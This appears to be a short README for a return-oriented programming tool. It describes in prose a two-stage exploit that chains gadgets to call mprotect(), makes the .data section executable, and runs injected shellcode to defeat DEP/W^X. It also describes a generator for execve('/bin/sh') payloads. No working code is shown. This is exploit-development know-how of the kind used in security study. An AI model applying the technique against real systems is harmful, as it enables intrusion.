A Delicious Exploit That Defeats DEP

Using the primitive tool we made in v1.0, we crafted an exploit that calls the mprotect() system call which has the ability alter the permissions in a given range of addresses. We used this to make the writable .data section executable as well, allowing us to inject code of our choosing and execute it, this defeating the W^X protection used in modern operating systems.

It is a 2-stage exploit.

1. The first stage is the ROP Payload which chains gadgets to executes mprotect system call and makes .data section executable and injects traditional shellcode into .data section.

2. Second stage is running the traditional shellcode - the classic way to exploit a system!

Primitive ROP tool

Uses syntactic methods to exploit the executable.
The exploit function is defined to be execve('/bin/sh').
If the vulnerable executable has the right instructions, a payload will be generated.